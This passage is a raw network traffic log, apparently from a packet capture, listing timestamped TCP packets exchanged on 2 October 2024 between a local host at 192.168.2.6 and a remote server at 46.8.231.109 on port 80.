                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.600766897 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.600775957 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.600788116 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.600812912 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.607120991 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.607135057 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.607146025 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.607157946 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.607167959 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.607178926 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.607213974 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.607243061 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.607254028 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.607264996 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.607285023 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.607300043 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.607425928 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.607436895 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.607461929 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.607474089 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.607477903 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.607486963 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.607491970 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.607498884 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.607510090 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.607515097 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.607522964 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.607527971 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.607553005 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.607599974 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.607610941 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.607642889 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.607734919 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.607749939 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.607769012 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.607784986 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.607918024 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.607928991 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.607939959 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.607952118 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.607959986 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.607963085 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.607992887 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.608010054 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.608079910 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.608093023 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.608113050 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.608128071 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.608263969 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.608274937 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.608285904 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.608297110 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.608297110 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.608308077 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.608310938 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.608319998 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.608339071 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.608376980 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.608434916 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.608445883 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.608455896 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.608467102 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.608468056 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.608483076 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.608499050 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.608620882 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.608632088 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.608640909 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.608652115 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.608663082 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.608691931 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.608788013 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.608798981 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.608809948 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.608820915 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.608820915 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.608835936 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.608838081 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.608853102 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.608877897 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.608973026 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.608983994 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.608995914 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.609005928 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.609005928 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.609019995 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.609036922 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.609149933 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.609162092 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.609173059 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.609200001 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.609222889 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.609316111 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.609327078 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.609357119 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.609488964 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.609499931 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.609508991 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.609520912 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.609529972 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.609555960 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.609637976 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.609649897 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.609659910 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.609668970 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.609671116 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.609684944 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.609685898 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.609697104 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.609699965 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.609708071 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.609715939 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.609719992 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.609730959 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.609741926 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.609744072 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.609757900 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.609776974 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.609954119 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.610030890 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.610133886 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.610146046 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.610155106 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.610163927 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.610174894 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.610182047 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.610186100 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.610196114 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.610202074 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.610229969 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.680988073 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.681003094 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.681015015 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.681077957 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.681077957 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.681128025 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.681139946 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.681152105 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.681163073 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.681165934 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.681194067 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.681222916 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.681277037 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.681288004 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.681302071 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.681312084 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.681327105 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.681355000 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.681444883 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.681458950 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.681468964 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.681479931 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.681485891 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.681490898 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.681502104 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.681508064 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.681538105 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.681627989 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.681639910 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.681674957 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.681804895 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.681817055 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.681828976 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.681839943 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.681873083 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.681885958 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.681945086 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.681977034 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.687583923 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.687597036 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.687608004 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.687633991 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.687669992 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.687725067 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.687737942 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.687769890 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.687916994 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.687932014 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.687942028 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.687952042 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.687963963 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.687968969 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.687974930 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.687988043 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.688014030 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.688060045 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.688071012 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.688105106 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.688132048 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.688260078 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.688271046 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.688282967 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.688288927 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.688306093 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.688324928 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.688437939 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.688448906 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.688458920 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.688468933 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.688472033 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.688481092 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.688488960 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.688492060 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.688517094 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.688530922 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.694717884 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.694731951 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.694744110 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.694797039 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.694797039 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.694871902 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.694884062 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.694895029 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.694905996 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.694919109 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.694941044 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.695024967 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.695035934 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.695070028 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.695171118 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.695182085 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.695192099 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.695202112 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.695211887 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.695218086 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.695249081 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.695353985 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.695363045 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.695375919 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.695394039 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.695400000 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.695420980 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.695442915 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.695513964 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.695523977 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.695533037 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.695543051 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.695543051 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.695559025 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.695579052 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.695611000 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.695661068 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.695672035 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.695683002 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.695693970 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.695708990 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.695733070 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.695795059 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.695806980 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.695817947 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.695828915 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.695852995 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.695987940 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.696000099 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.696012020 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.696022034 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.696022987 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.696034908 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.696039915 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.696055889 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.696085930 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.696144104 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.696156025 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.696166039 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.696176052 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.696177959 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.696187973 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.696197033 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.696218967 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.696326017 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.696336985 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.696347952 CEST805851546.8.231.109192.168.2.6
